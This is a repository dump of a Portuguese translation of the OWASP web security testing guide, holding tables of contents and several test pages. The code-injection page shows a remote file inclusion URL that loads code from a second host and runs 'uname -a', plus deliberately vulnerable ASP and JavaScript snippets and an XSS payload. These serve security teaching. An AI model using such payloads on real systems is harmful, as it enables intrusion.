https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/11-Testes-a-Nivel-do-Cliente/images/Clickjacking_example_malicious_page_2.png -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/11-Testes-a-Nivel-do-Cliente/images/Clickjacking_example_malicious_page_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/11-Testes-a-Nivel-do-Cliente/images/Clickjacking_example_malicious_page_3.png -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/06-Testes-Gerenciamento-de-Sessao/images/Session_Riding_Firewall_Management.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/06-Testes-Gerenciamento-de-Sessao/images/Session_Riding_Firewall_Management.gif -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/06-Testes-Gerenciamento-de-Sessao/images/Session_Riding_Firewall_Management_2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/06-Testes-Gerenciamento-de-Sessao/images/Session_Riding_Firewall_Management_2.gif -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/01-Coleta-de-Informacoes/images/Google_cache_Operator_Search_Results_Example_20200406.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/01-Coleta-de-Informacoes/images/Google_cache_Operator_Search_Results_Example_20200406.png -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/01-Coleta-de-Informacoes/images/Google_site_Operator_Search_Results_Example_20200406.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/01-Coleta-de-Informacoes/images/Google_site_Operator_Search_Results_Example_20200406.png -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/09-Testes-para-Criptografia-Fragil/images/SSL_Certificate_Validity_Testing_IE_Warning.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/09-Testes-para-Criptografia-Fragil/images/SSL_Certificate_Validity_Testing_IE_Warning.gif -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/01-Coleta-de-Informacoes/09-Mapa-de-Aplicativos-Web.md: -------------------------------------------------------------------------------- 1 | # Mapa de Aplicativos Web 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-INFO-09| 6 | 7 | Este conteúdo foi combinado com: [Mapa do Framework de Aplicativos Web](08-Mapa-do-Framework-de-Aplicativos-Web.md). 8 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/images/subdomain_takeover_ex1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/images/subdomain_takeover_ex1.jpeg -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/images/subdomain_takeover_ex2.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/images/subdomain_takeover_ex2.jpeg -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/08-Testes-Tratamento-de-Erros/README.md: -------------------------------------------------------------------------------- 1 | # 4.8 Testing for Error Handling 2 | 3 | 4.8.1 [Testando Manipulação Incorreta de Erros](01-Testando-Manipulação-Incorreta-de-Erros.md) 4 | 5 | 4.8.2 [Testando o Rastreamento de listas ou Stack Traces](02-Testando-Stack-Traces.md) 6 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/09-Testes-para-Criptografia-Fragil/images/SSL_Certificate_Validity_Testing_Firefox_Warning.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doverh/wstg-translations-pt/HEAD/4-Testes-Seguranca-Web-Apps/09-Testes-para-Criptografia-Fragil/images/SSL_Certificate_Validity_Testing_Firefox_Warning.gif -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/08-Testes-Tratamento-de-Erros/02-Testando-Stack-Traces.md: -------------------------------------------------------------------------------- 1 | # Testando o Rastreamento de listas ou Stack Traces 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-ERRH-02| 6 | 7 | Este conteúdo foi combinado com : [Testando Manipulação Incorreta de Erros](01-Testando-Manipulação-Incorreta-de-Erros.md) 8 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/07-Testes-Validacao-de-Entrada-de-Dados/03-Testing_for_HTTP_Verb_Tampering.md: -------------------------------------------------------------------------------- 1 | # Testing for HTTP Verb Tampering 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-INPV-03| 6 | 7 | This content has been merged into: [Test HTTP Methods](../02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md) 8 | -------------------------------------------------------------------------------- /6-Apendice/README.md: -------------------------------------------------------------------------------- 1 | # Appendix 2 | 3 | Appendix A. [Testing Tools Resource](A-Testing_Tools_Resource.md) 4 | 5 | Appendix B. [Suggested Reading](B-Suggested_Reading.md) 6 | 7 | Appendix C. [Fuzz Vectors](C-Fuzz_Vectors.md) 8 | 9 | Appendix D. [Encoded Injection](D-Encoded_Injection.md) 10 | 11 | Appendix E. [History](E-History.md) 12 | 13 | Appendix F. [Leveraging Dev Tools](F-Leveraging_Dev_Tools.md) 14 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/09-Testes-para-Criptografia-Fragil/README.md: -------------------------------------------------------------------------------- 1 | # 4.9 Testing for Weak Cryptography 2 | 3 | 4.9.1 [Testing for Weak Transport Layer Security](01-Testing_for_Weak_Transport_Layer_Security.md) 4 | 5 | 4.9.2 [Testing for Padding Oracle](02-Testing_for_Padding_Oracle.md) 6 | 7 | 4.9.3 [Testing for Sensitive Information Sent via Unencrypted Channels](03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md) 8 | 9 | 4.9.4 [Testing for Weak Encryption](04-Testing_for_Weak_Encryption.md) 10 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/05-Testes-de-Autorizacao/README.md: -------------------------------------------------------------------------------- 1 | # 4.5 Authorization Testing 2 | 3 | 4.5.1 [Testando Diretório Transversal ou Path Traversal e Inclusão de Arquivo](01-Testando-Path-Traversal-e-Inclusão-de-Arquivo.md) 4 | 5 | 4.5.2 [Testando o Desvio do Esquema de Autorização](02-Testando-o-Desvio-do-Esquema-de-Autorização.md) 6 | 7 | 4.5.3 [Testando a Escalada de Privilégios](03-Testando-a-Escalada-de-Privilégios.md) 8 | 9 | 4.5.4 [Testando Referência Direta Insegura a Objetos](04-Testando-Referência-Direta-Insegura-a-Objetos.md) 10 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/03-Testes-Gerenciamento-de-Identidade/README.md: -------------------------------------------------------------------------------- 1 | # 4.3 Testes de Gerenciamento de Identidade 2 | 3 | 4.3.1 [Testar Definições de Funções](01-Testar-Definicoes-de-Funcoes.md) 4 | 5 | 4.3.2 [Testar Processo de Registro de Usuário](02-Testar-Processo-de-Registro-de-Usuario.md) 6 | 7 | 4.3.3 [Testar Processo de Provisionamento de Conta](03-Testar-Processo-de-Provisionamento-de-Conta.md) 8 | 9 | 4.3.4 [Testar Enumeração de Conta e Nome de Usuário Presumível](04-Testar-Enumeração-de-Conta-e-Nome-de-Usuário-Presumivel.md) 10 | 11 | 4.3.5 [Testando Políticas Fraca ou Não Aplicada de Nome de Usuário](05-Testando-Política-Fraca-ou-Não-Aplicada-de-Nome-de-Usuário.md) -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/06-Testes-Gerenciamento-de-Sessao/README.md: -------------------------------------------------------------------------------- 1 | # 4.6 Testes Gerenciamento de Sessão 2 | 3 | 4.6.1 [Testando o Esquema de Gerenciamento de Sessão](01-Testando_o_Esquema_de_Gerenciamento_de_Sessão.md) 4 | 5 | 4.6.2 [Testing for Cookies Attributes](02-Testando-Atributos-de-Cookies.md) 6 | 7 | 4.6.3 [Testes de Fixação da Sessão](03-Testes-de-Fixação-da-Sessão.md) 8 | 9 | 4.6.4 [Testando a Exposição de Variáveis de Sessão](04-Testando-a-Exposição-de-Variáveis-de-Sessão.md) 10 | 11 | 4.6.5 [Testando CSRF](05-Testando-CSRF.md) 12 | 13 | 4.6.6 [Teste de Funcionalidade de Logout](06-Teste-de-Funcionalidade-de-Logout.md) 14 | 15 | 4.6.7 [Testando o Tempo Limite da Sessão](07-Testando-o-Tempo-Limite-da-Sessão.md) 16 | 17 | 4.6.8 [Testando a Sobrecarga de Variáveis da Sessão](08-Testando-a-Sobrecarga-de-Variáveis-da-Sessão.md) 18 | 19 | 4.6.9 [Testando o Sequestro da Sessão](09-Testando-o-Sequestro-da-Sessão.md) 20 | -------------------------------------------------------------------------------- /3-Framework-Testes-OWASP/README.md: -------------------------------------------------------------------------------- 1 | # Framework de Testes OWASP 2 | 3 | ### 3.1 [Framework de Testes de Seguranca Web](0-Framework-Testes-Seguranca-Web.md) 4 | 5 | ### 3.2 [Fase 1 Pré Desenvolvimento](0-Framework-Testes-Seguranca-Web.md#fase-1-pre-desenvolvimento) 6 | 7 | ### 3.3 [Fase 2 Durante a Definição e o Design](0-Framework-Testes-Seguranca-Web.md#fase-2-durante-a-definição-e-o-design) 8 | 9 | ### 3.4 [Fase 3 Durante o Desenvolvimento](0-Framework-Testes-Seguranca-Web.md#fase-3-durante-o-desenvolvimento) 10 | 11 | ### 3.5 [Fase 4 Durante a Implementação](0-Framework-Testes-Seguranca-Web.md#fase-4-durante-a-implementação) 12 | 13 | ### 3.6 [Fase 5 Durante a Manutenção e Operações and Operations](0-Framework-Testes-Seguranca-Web.md#fase-5-durante-a-manutenção-e-operações) 14 | 15 | ### 3.7 [Tìpico Workflow de Testes SDLC](0-Framework-Testes-Seguranca-Web.md#tipico-workflow-de-testes-sdlc) 16 | 17 | ### 3.8 [Metodologias de Testes de Invasão](1-Metodologias-de-Testes-de-Invasão.md) 18 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/10-Testes-de-Logica-de-Negocios/README.md: -------------------------------------------------------------------------------- 1 | # 4.10 Business Logic Testing 2 | 3 | 4.10.0 [Introduction to Business Logic](00-Introduction_to_Business_Logic.md) 4 | 5 | 4.10.1 [Test Business Logic Data Validation](01-Test_Business_Logic_Data_Validation.md) 6 | 7 | 4.10.2 [Test Ability to Forge Requests](02-Test_Ability_to_Forge_Requests.md) 8 | 9 | 4.10.3 [Test Integrity Checks](03-Test_Integrity_Checks.md) 10 | 11 | 4.10.4 [Test for Process Timing](04-Test_for_Process_Timing.md) 12 | 13 | 4.10.5 [Test Number of Times a Function Can Be Used Limits](05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits.md) 14 | 15 | 4.10.6 [Testing for the Circumvention of Work Flows](06-Testing_for_the_Circumvention_of_Work_Flows.md) 16 | 17 | 4.10.7 [Test Defenses Against Application Misuse](07-Test_Defenses_Against_Application_Misuse.md) 18 | 19 | 4.10.8 [Test Upload of Unexpected File Types](08-Test_Upload_of_Unexpected_File_Types.md) 20 | 21 | 4.10.9 [Test Upload of Malicious Files](09-Test_Upload_of_Malicious_Files.md) 22 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/01-Coleta-de-Informacoes/README.md: -------------------------------------------------------------------------------- 1 | # 4.1 Coleta de Informações 2 | 3 | 4.1.1 [Conduza Busca de Reconhecimento por Informações Vazadas](01-Conduza-Buscas-de-Reconhecimento.md) 4 | 5 | 4.1.2 [Fingerprint de Servidor Web](02-Fingerprint-de-Servidor-Web.md) 6 | 7 | 4.1.3 [Revisar Vazamento de Informações em Arquivos de Metadados do Servidor](03-Revisar-Vazamento-de-Informações-em-Arquivos-de-Metadados-do-Servidor.md) 8 | 9 | 4.1.4 [Enumerar Aplicações em um Servidor Web](04-Enumerar-Aplicações-em-um-Servidor-Web.md) 10 | 11 | 4.1.5 [Revisão de Conteúdo de Página Web para Vazamento de Informações](05-Revisão-de-Conteúdo-de-Página-Web-para-Vazamento-de-Informações.md) 12 | 13 | 4.1.6 [Identificação de Pontos de Entrada da Aplicação](06-Identificação-de-Pontos-de-Entrada-da-Aplicativo.md) 14 | 15 | 4.1.7 [Mapear Fluxos de Execucação do Applicativo.md](07-Mapear-Fluxos-de-Execucação-do-Applicativo.md) 16 | 17 | 4.1.8 [Mapa do Framework de Aplicativos Web](08-Mapa-do-Framework-de-Aplicativos-Web.md) 18 | 19 | 4.1.9 [Mapa do Framework de Aplicativos Web](09-Mapa-de-Aplicativos-Web.md) 20 | 21 | 4.1.10 [Mapeamento da Arquitetura de Aplicativos](10-Mapeamento-da-Arquitetura-de-Aplicativos.md) 22 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/11-Testes-a-Nivel-do-Cliente/README.md: -------------------------------------------------------------------------------- 1 | # 4.11 Client-Side Testing 2 | 3 | 4.11.1 [Testing for DOM-Based Cross Site Scripting](01-Testing_for_DOM-based_Cross_Site_Scripting.md) 4 | 5 | 4.11.2 [Testing for JavaScript Execution](02-Testing_for_JavaScript_Execution.md) 6 | 7 | 4.11.3 [Testing for HTML Injection](03-Testing_for_HTML_Injection.md) 8 | 9 | 4.11.4 [Testing for Client-side URL Redirect](04-Testing_for_Client-side_URL_Redirect.md) 10 | 11 | 4.11.5 [Testing for CSS Injection](05-Testing_for_CSS_Injection.md) 12 | 13 | 4.11.6 [Testing for Client-side Resource Manipulation](06-Testing_for_Client-side_Resource_Manipulation.md) 14 | 15 | 4.11.7 [Testing Cross Origin Resource Sharing](07-Testing_Cross_Origin_Resource_Sharing.md) 16 | 17 | 4.11.8 [Testing for Cross Site Flashing](08-Testing_for_Cross_Site_Flashing.md) 18 | 19 | 4.11.9 [Testing for Clickjacking](09-Testing_for_Clickjacking.md) 20 | 21 | 4.11.10 [Testing WebSockets](10-Testing_WebSockets.md) 22 | 23 | 4.11.11 [Testing Web Messaging](11-Testing_Web_Messaging.md) 24 | 25 | 4.11.12 [Testing Browser Storage](12-Testing_Browser_Storage.md) 26 | 27 | 4.11.13 [Testing for Cross Site Script Inclusion](13-Testing_for_Cross_Site_Script_Inclusion.md) 28 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/04-Testes-de-Autenticacao/README.md: -------------------------------------------------------------------------------- 1 | # 4.4 Testes de Autenticação 2 | 3 | 4.4.1 [Testando Credenciais Transmitidas por Canal Criptografado](01-Testando-Credenciais-Transmitidas-por-Canal-Criptografado.md) 4 | 5 | 4.4.2 [Teste de Credenciais Padrão](02-Teste-de-Credenciais-Padrão.md) 6 | 7 | 4.4.3 [Testando Mecanismo de Bloqueio de Contas](03-Testando-Mecanismo-de-Bloqueio-de-Contas.md) 8 | 9 | 4.4.4 [Testando o Desvio do Esquema de Autenticação](04-Testando-o-Desvio-do-Esquema-de-Autenticação.md) 10 | 11 | 4.4.5 [Testando Dicas de Recuperação de Senhas Vulneráveis](05-Testando-Dicas-de-Recuperação-de-Senhas-Vulneráveis.md) 12 | 13 | 4.4.6 [Testando a Fragilidade no Cache do Navegador](06-Testando-a-Fragilidade-no-Cache-do-Navegador.md) 14 | 15 | 4.4.7 [Testando Política de Senha Fraca](07-Testando-de-Politica-de-Senha-Fraca.md) 16 | 17 | 4.4.8 [Testando Respostas Fracas para Perguntas de Segurança](08-Testando-Respostas-Fracas-para-Perguntas-de-Segurança.md) 18 | 19 | 4.4.9 [Testando Funcionalidades Fracas para Alteração ou Redefinição de Senha](09-Testando-Funcionalidades- Fracas-para-Alteração-ou-Redefinição-de-Senha.md) 20 | 21 | 4.4.10 [Testando Autenticação Fraca em Canais Alternativos](10-Testando-Autenticação-Fraca-em-Canais-Alternativos.md) 22 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/03-Testes-Gerenciamento-de-Identidade/05-Testando-Política-Fraca-ou-Não-Aplicada-de-Nome-de-Usuário.md: -------------------------------------------------------------------------------- 1 | # Testando Políticas Fraca ou Não Aplicada de Nome de Usuário 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-IDNT-05| 6 | 7 | ## Resumo 8 | 9 | Os nomes de contas de usuário frequentemente seguem uma estrutura altamente padronizada (por exemplo, o nome de Joe Bloggs é jbloggs e o nome de Fred Nurks é fnurks) e nomes de contas válidos podem ser facilmente adivinhados. 10 | 11 | ## Objetivos do Teste 12 | 13 | - Determinar se uma estrutura consistente de nomes de conta torna a aplicação vulnerável à enumeração de contas. 14 | - Determinar se as mensagens de erro da aplicação permitem a enumeração de contas. 15 | 16 | ## Como Testar 17 | 18 | - Determinar a estrutura dos nomes de conta. 19 | - Avaliar a resposta da aplicação a nomes de conta válidos e inválidos. 20 | - Usar respostas diferentes para nomes de conta válidos e inválidos para enumerar nomes de conta válidos. 21 | - Usar dicionários de nomes de conta para enumerar nomes de conta válidos. 22 | 23 | ## Remediação 24 | 25 | Garanta que a aplicação retorne mensagens de erro genéricas consistentes em resposta a nomes de conta inválidos, senhas ou outras credenciais de usuário inseridas durante o processo de login. -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/02-Testes-de-Configuracao-e-Gerenciamento-de-Implementacao/README.md: -------------------------------------------------------------------------------- 1 | # 4.2 Testes de Gerenciamento de Configuração e Implantação 2 | 3 | 4.2.1 [Testar Configuração da Infraestrutura de Rede](01-Testar-Configuracao-da-Infraestrutura-de-Rede.md) 4 | 5 | 4.2.2 [Testar Configuração da Plataforma do Aplicativo](02-Testar-Configuracao-da-Plataforma-de-Aplicativo.md) 6 | 7 | 4.2.3 [Testar o Manejo de Extensões de Arquivo para Informações Sensíveis](03-Testar-Manejo-de-Extensoes-de-Arquivo-para-Informacoes-Sensiveis.md) 8 | 9 | 4.2.4 [Revisar Backups Antigos e Arquivos Não Referenciados para Informações Sensíveis](04-Revisar-Backups-Antigos-e-Arquivos-Nao-Referenciados-para-Informacoes-Sensiveis.md) 10 | 11 | 4.2.5 [Enumerar Interfaces de Administração de Infraestrutura e Aplicativo](05-Enumerar-Interfaces-de-Administracao-de-Infraestrutura-e-Aplicativo.md) 12 | 13 | 4.2.6 [Testar Métodos HTTP](06-Testar-Metodos-HTTP.md) 14 | 15 | 4.2.7 [Testar Segurança de Transporte Estrito HTTP](07-Testar-Seguranca-de-Transporte-Estrito-HTTP.md) 16 | 17 | 4.2.8 [Testar Política de Domínio Cruzado de RIA](08-Testar-Politica-de-Dominio-Cruzado-de-RIA.md) 18 | 19 | 4.2.9 [Testar Permissão de Arquivo](09-Testar-Permissao-de-Arquivo.md) 20 | 21 | 4.2.10 [Testar Tomada de Subdomínio](10-Testar-Tomada-de-Subdominio.md) 22 | 23 | 4.2.11 [Testar Armazenamento na Nuvem](11-Testar-Armazenamento-na-Nuvem.md) 24 | -------------------------------------------------------------------------------- /6-Apendice/C-Fuzz_Vectors.md: -------------------------------------------------------------------------------- 1 | # Fuzz Vectors 2 | 3 | The following are fuzzing vectors which can be used with [ZAP](https://www.zaproxy.org), [Burp Suite](https://portswigger.net/burp), or another testing tool. [Fuzzing](https://owasp.org/www-community/Fuzzing) is the "kitchen sink" approach to testing the responses of an application to parameter manipulation. Generally, an analyst looks for error conditions or abnormal behaviors that occur in an application as a result of fuzzing. 4 | 5 | The following references are provided as input sources for fuzzing and related testing activities. 6 | 7 | - [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) 8 | - [AwesomeXSS](https://github.com/s0md3v/AwesomeXSS) 9 | - [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings) 10 | - [Big List of Naughty Strings](https://github.com/minimaxir/big-list-of-naughty-strings) 11 | - [Bo0oM Fuzz List](https://github.com/Bo0oM/fuzz.txt) 12 | - [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) 13 | - [bl4de Dictionaries](https://github.com/bl4de/dictionaries) 14 | - [Open Redirect Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) 15 | - [EdOverflow Bug Bounty Cheat Sheet](https://github.com/EdOverflow/bugbounty-cheatsheet) 16 | - [Daniel Miessler - SecLists](https://github.com/danielmiessler/SecLists) 17 | - [XssPayloads Twitter Feed](https://twitter.com/XssPayloads) 18 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/03-Testes-Gerenciamento-de-Identidade/03-Testar-Processo-de-Provisionamento-de-Conta.md: -------------------------------------------------------------------------------- 1 | # Testar Processo de Provisionamento de Conta 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-IDNT-03| 6 | 7 | ## Resumo 8 | 9 | O provisionamento de contas oferece uma oportunidade para um invasor criar uma conta válida sem a aplicação adequada do processo de identificação e autorização. 10 | 11 | ## Objetivos do Teste 12 | 13 | - Verificar quais contas podem provisionar outras contas e de que tipo. 14 | 15 | ## Como Testar 16 | 17 | Determine quais funções podem provisionar usuários e que tipo de contas elas podem provisionar. 18 | 19 | - Existe alguma verificação, avaliação e autorização de solicitações de provisionamento? 20 | - Existe alguma verificação, avaliação e autorização de solicitações de desprovisionamento? 21 | - Um administrador pode provisionar outros administradores ou apenas usuários? 22 | - Um administrador ou outro usuário pode provisionar contas com privilégios superiores aos seus próprios? 23 | - Um administrador ou usuário pode se desprovisionar? 24 | - Como são gerenciados os arquivos ou recursos de propriedade do usuário desprovisionado? Eles são excluídos? O acesso é transferido? 25 | 26 | ### Exemplo 27 | 28 | No WordPress, apenas o nome do usuário e o endereço de e-mail são necessários para provisionar o usuário, como mostrado abaixo: 29 | 30 | \ 31 | *Figura 4.3.3-1: Adicionar Usuário no WordPress* 32 | 33 | O desprovisionamento de usuários requer que o administrador selecione os usuários a serem desprovisionados, selecione Excluir no menu suspenso (circulado) e, em seguida, aplique essa ação. O administrador é então apresentado com uma caixa de diálogo perguntando o que fazer com as postagens do usuário (excluir ou transferir). 34 | 35 | \ 36 | *Figura 4.3.3-2: Autenticação e Usuários no WordPress* 37 | 38 | ## Ferramentas 39 | 40 | Embora a abordagem mais completa e precisa para concluir este teste seja fazê-lo manualmente, ferramentas de proxy HTTP também podem ser úteis. -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/07-Testes-Validacao-de-Entrada-de-Dados/11-Testing_for_Code_Injection.md: -------------------------------------------------------------------------------- 1 | # Testing for Code Injection 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-INPV-11| 6 | 7 | ## Summary 8 | 9 | This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server. 10 | 11 | In [Code Injection](https://owasp.org/www-community/attacks/Code_Injection) testing, a tester submits input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, e.g., ASP or PHP. Proper input validation and secure coding practices need to be employed to protect against these attacks. 12 | 13 | ## Test Objectives 14 | 15 | - Identify injection points where you can inject code into the application. 16 | - Assess the injection severity. 17 | 18 | ## How to Test 19 | 20 | ### Black-Box Testing 21 | 22 | #### Testing for PHP Injection Vulnerabilities 23 | 24 | Using the querystring, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file: 25 | 26 | `http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a` 27 | 28 | > The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file. 29 | 30 | ### Gray-Box Testing 31 | 32 | #### Testing for ASP Code Injection Vulnerabilities 33 | 34 | Examine ASP code for user input used in execution functions. Can the user enter commands into the Data input field? Here, the ASP code will save the input to a file and then execute it: 35 | 36 | ```asp 37 | <% 38 | If not isEmpty(Request( "Data" ) ) Then 39 | Dim fso, f 40 | 'User input Data is written to a file named data.txt 41 | Set fso = CreateObject("Scripting.FileSystemObject") 42 | Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True) 43 | f.Write Request("Data") & vbCrLf 44 | f.close 45 | Set f = nothing 46 | Set fso = Nothing 47 | 48 | 'Data.txt is executed 49 | Server.Execute( "data.txt" ) 50 | 51 | Else 52 | %> 53 | 54 |
58 | <% 59 | End If 60 | %>))) 61 | ``` 62 | 63 | ### References 64 | 65 | - [Security Focus](http://www.securityfocus.com) 66 | - [Insecure.org](http://www.insecure.org) 67 | - [Wikipedia](http://www.wikipedia.org) 68 | - [Reviewing Code for OS Injection](https://wiki.owasp.org/index.php/OS_Injection) 69 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/11-Testes-a-Nivel-do-Cliente/02-Testing_for_JavaScript_Execution.md: -------------------------------------------------------------------------------- 1 | # Testing for JavaScript Execution 2 | 3 | |ID | 4 | |------------| 5 | |WSTG-CLNT-02| 6 | 7 | ## Summary 8 | 9 | A JavaScript injection vulnerability is a subtype of cross site scripting (XSS) that involves the ability to inject arbitrary JavaScript code that is executed by the application inside the victim's browser. This vulnerability can have many consequences, like the disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims or the application's behavior. 10 | 11 | JavaScript injection vulnerabilities can occur when the application lacks proper user-supplied input and output validation. As JavaScript is used to dynamically populate web pages, this injection occurs during this content processing phase and consequently affects the victim. 12 | 13 | When testing for this vulnerability, consider that some characters are treated differently by different browsers. For reference, see [DOM-based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS). 14 | 15 | Here is an example of a script that does not perform any validation of the variable `rr`. The variable contains user-supplied input via the query string, and additionally does not apply any form of encoding: 16 | 17 | ```js 18 | var rr = location.search.substring(1); 19 | if(rr) { 20 | window.location=decodeURIComponent(rr); 21 | } 22 | ``` 23 | 24 | This implies that an attacker could inject JavaScript code simply by submitting the following query string: `www.victim.com/?javascript:alert(1)`. 25 | 26 | ## Test Objectives 27 | 28 | - Identify sinks and possible JavaScript injection points. 29 | 30 | ## How to Test 31 | 32 | Consider the following: [DOM XSS exercise](http://www.domxss.com/domxss/01_Basics/04_eval.html) 33 | 34 | The page contains the following script: 35 | 36 | ```html 37 | 49 | ``` 50 | 51 | The above code contains a source `location.hash` that is controlled by the attacker that can inject directly in the `message` value a JavaScript Code to take the control of the user browser. 52 | -------------------------------------------------------------------------------- /4-Testes-Seguranca-Web-Apps/07-Testes-Validacao-de-Entrada-de-Dados/README.md: -------------------------------------------------------------------------------- 1 | # 4.7 Input Validation Testing 2 | 3 | 4.7.1 [Testing for Reflected Cross Site Scripting](01-Testing_for_Reflected_Cross_Site_Scripting.md) 4 | 5 | 4.7.2 [Testing for Stored Cross Site Scripting](02-Testing_for_Stored_Cross_Site_Scripting.md) 6 | 7 | 4.7.3 [Testing for HTTP Verb Tampering](03-Testing_for_HTTP_Verb_Tampering.md) 8 | 9 | 4.7.4 [Testing for HTTP Parameter Pollution](04-Testing_for_HTTP_Parameter_Pollution.md) 10 | 11 | 4.7.5 [Testing for SQL Injection](05-Testing_for_SQL_Injection.md) 12 | 13 | - 4.7.5.1 [Testing for Oracle](05.1-Testing_for_Oracle.md) 14 | 15 | - 4.7.5.2 [Testing for MySQL](05.2-Testing_for_MySQL.md) 16 | 17 | - 4.7.5.3 [Testing for SQL Server](05.3-Testing_for_SQL_Server.md) 18 | 19 | - 4.7.5.4 [Testing PostgreSQL](05.4-Testing_PostgreSQL.md) 20 | 21 | - 4.7.5.5 [Testing for MS Access](05.5-Testing_for_MS_Access.md) 22 | 23 | - 4.7.5.6 [Testing for NoSQL Injection](05.6-Testing_for_NoSQL_Injection.md) 24 | 25 | - 4.7.5.7 [Testing for ORM Injection](05.7-Testing_for_ORM_Injection.md) 26 | 27 | - 4.7.5.8 [Testing for Client-side](05.8-Testing_for_Client-side.md) 28 | 29 | 4.7.6 [Testing for LDAP Injection](06-Testing_for_LDAP_Injection.md) 30 | 31 | 4.7.7 [Testing for XML Injection](07-Testing_for_XML_Injection.md) 32 | 33 | 4.7.8 [Testing for SSI Injection](08-Testing_for_SSI_Injection.md) 34 | 35 | 4.7.9 [Testing for XPath Injection](09-Testing_for_XPath_Injection.md) 36 | 37 | 4.7.10 [Testing for IMAP SMTP Injection](10-Testing_for_IMAP_SMTP_Injection.md) 38 | 39 | 4.7.11 [Testing for Code Injection](11-Testing_for_Code_Injection.md) 40 | 41 | - 4.7.11.1 [Testing for Local File Inclusion](11.1-Testing_for_Local_File_Inclusion.md) 42 | 43 | - 4.7.11.2 [Testing for Remote File Inclusion](11.2-Testing_for_Remote_File_Inclusion.md) 44 | 45 | 4.7.12 [Testing for Command Injection](12-Testing_for_Command_Injection.md) 46 | 47 | 4.7.13 [Testing for Format String Injection](13-Testing_for_Format_String_Injection.md) 48 | 49 | 4.7.14 [Testing for Incubated Vulnerability](14-Testing_for_Incubated_Vulnerability.md) 50 | 51 | 4.7.15 [Testing for HTTP Splitting Smuggling](15-Testing_for_HTTP_Splitting_Smuggling.md) 52 | 53 | 4.7.16 [Testing for HTTP Incoming Requests](16-Testing_for_HTTP_Incoming_Requests.md) 54 | 55 | 4.7.17 [Testing for Host Header Injection](17-Testing_for_Host_Header_Injection.md) 56 | 57 | 4.7.18 [Testing for Server-side Template Injection](18-Testing_for_Server-side_Template_Injection.md) 58 | 59 | 4.7.19 [Testing for Server-Side Request Forgery](19-Testing_for_Server-Side_Request_Forgery.md) 60 | -------------------------------------------------------------------------------- 